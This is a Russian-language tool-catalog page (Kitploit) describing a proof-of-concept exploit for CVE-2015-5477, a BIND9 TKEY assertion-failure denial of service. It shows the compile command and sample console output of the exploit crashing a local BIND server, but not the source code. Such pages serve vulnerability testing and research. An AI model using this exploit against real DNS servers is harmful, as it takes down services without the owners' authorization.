Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
cve-2015-5477 — PoC exploit for CVE-2015-5477 BIND9 TKEY assertion failure | Kitploit
Инструменты/GitHubGitHub/robertdavidgraham/cve-2015-5477
Vulnerability AnalysisExploitationPenetration TestingDNS Analysis
GitHubrobertdavidgraham/cve-2015-5477

cve-2015-5477

PoC exploit for CVE-2015-5477 BIND9 TKEY assertion failure

Репозиторий
644211 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

PoC для BOND9 TKEY assert DoS (CVE-2015-5477)

Этот эксплоит проверяет, уязвим ли сервер BIND9, отправляя эксплоит, чтобы увидеть, произойдет ли сбой.

Это код на C, который вы компилируете обычным способом в Unix/Windows, например:

root@kitploit:~
# gcc tkill.c -o tkill

Он будет работать как через IPv4, так и через IPv6.

Вот как это выглядит при запуске против localhost. Поскольку он получает два IP-адреса при разрешении имени, он попробует оба. Сначала он запрашивает строку "version", затем отправляет эксплоит. Когда он проверяет второй адрес, запрос версии не удается, потому что служба уже аварийно завершилась от первой попытки.

root@kitploit:~
root@kali:~/cve-2015-5477# ./a.out localhost
--- PoC for CVE-2015-5477 BIND9 TKEY assert DoS ---
[+] localhost: Разрешение IP-адреса
[+] localhost: Разрешено несколько IP-адресов (ПРИМЕЧАНИЕ)
[+] ::1: Проверка...
[+] Запрос версии...
[+] ::1: "9.11.0pre-alpha"
[+] Отправка DoS-пакета...
[+] Ожидание 5 секунд ответа...
[+] тайм-аут, вероятно, аварийное завершение

[+] 127.0.0.1: Проверка...
[+] Запрос версии...
[-] тайм-аут при получении версии, повторная попытка
[-] тайм-аут при получении версии, повторная попытка
[-] тайм-аут при получении версии, повторная попытка
[-] Не удается запросить сервер, он уже аварийно завершился?
[-] Отправка эксплоита в любом случае.
[+] Отправка DoS-пакета...
[+] Ожидание 5 секунд ответа...
[+] тайм-аут, вероятно, аварийное завершение
Скачать инструмент